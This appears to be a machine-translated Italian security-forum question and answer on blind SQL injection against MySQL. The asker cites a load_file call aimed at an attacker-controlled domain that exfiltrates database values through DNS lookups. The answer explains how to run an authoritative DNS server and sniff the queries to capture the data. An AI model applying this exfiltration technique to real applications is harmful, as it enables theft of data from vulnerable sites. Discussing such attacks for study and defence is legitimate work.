Blind SQL Injection utilizzando OOB DNS Guida pratica di sniffing

2

Stavo guardando articolo eccellente da Defcon 15 che era il recupero dei dati su DNS durante SQL Injection Attacks. ( link ). In questo l'oratore ha dimostrato gli attacchi contro MSSQL.

Ho appena provato a riprodurre lo stesso problema ma con il server MySQL, con una piccola ricerca ho trovato load_file(\\dns.mysite.com\) può colpire server DNS esponendo qualsiasi concatenazione di attacker in load_file() come @@ version, user () ecc se L'applicazione è vulnerabile . La domanda è: come potrei effettivamente mantenere il SNIFF THE DNS Request fatto sul mio server, mentre guardi nel video chi parla usa uno Sniffer DNS per registrare la richiesta Hit dal sito vulnerabile al suo Server.

Qualcuno ha degli input su come impostare praticamente un server web di un attaccante (mysite.com) tramite DNS Sniffing o altre tecniche che ho perso qui?

    
posta Gerorge Timber 17.06.2016 - 18:30
fonte

1 risposta

2

Video interessante. Secondo me, per configurare questo tipo sulla tecnica, è necessario:

  1. Possedere un nome di dominio, ad esempio mysite.com

  2. Ogni nome di dominio ha un "name server autoritativo". Di solito il server dei nomi autorevoli è gestito dalla società che ti ha venduto il nome di dominio.

  3. Devi configurare il tuo server DNS autorevole su un indirizzo IP pubblico, quindi chiedere alla società che ti ha venduto il nome di dominio per impostare il server DNS come server dei nomi autorevoli per il tuo dominio.

  4. Ora sei il proprietario del server DNS che risponderà alla query DNS creata da questo sito Web / applicazione apparentemente vulnerabile

  5. A causa del fatto che sei il proprietario del server DNS puoi semplicemente registrare tutte le richieste DNS, che conterranno i tuoi dati.
    O forse preferisci impostare uno sniffer, come Wireshark, sul server DNS, per annusare le richieste DNS in tempo reale.

Nota: non ho mai provato ad impostare un server dei nomi autorevole, quindi non so se c'è qualcosa di particolare (tecnico o burocratico) da fare.

Nota 2: le modifiche DNS richiedono tempo per propagarsi, quindi suppongo che anche una modifica del server dei nomi autorevole richiederà del tempo per propagarsi in tutto il mondo.

    
risposta data 22.06.2016 - 22:49
fonte

Leggi altre domande sui tag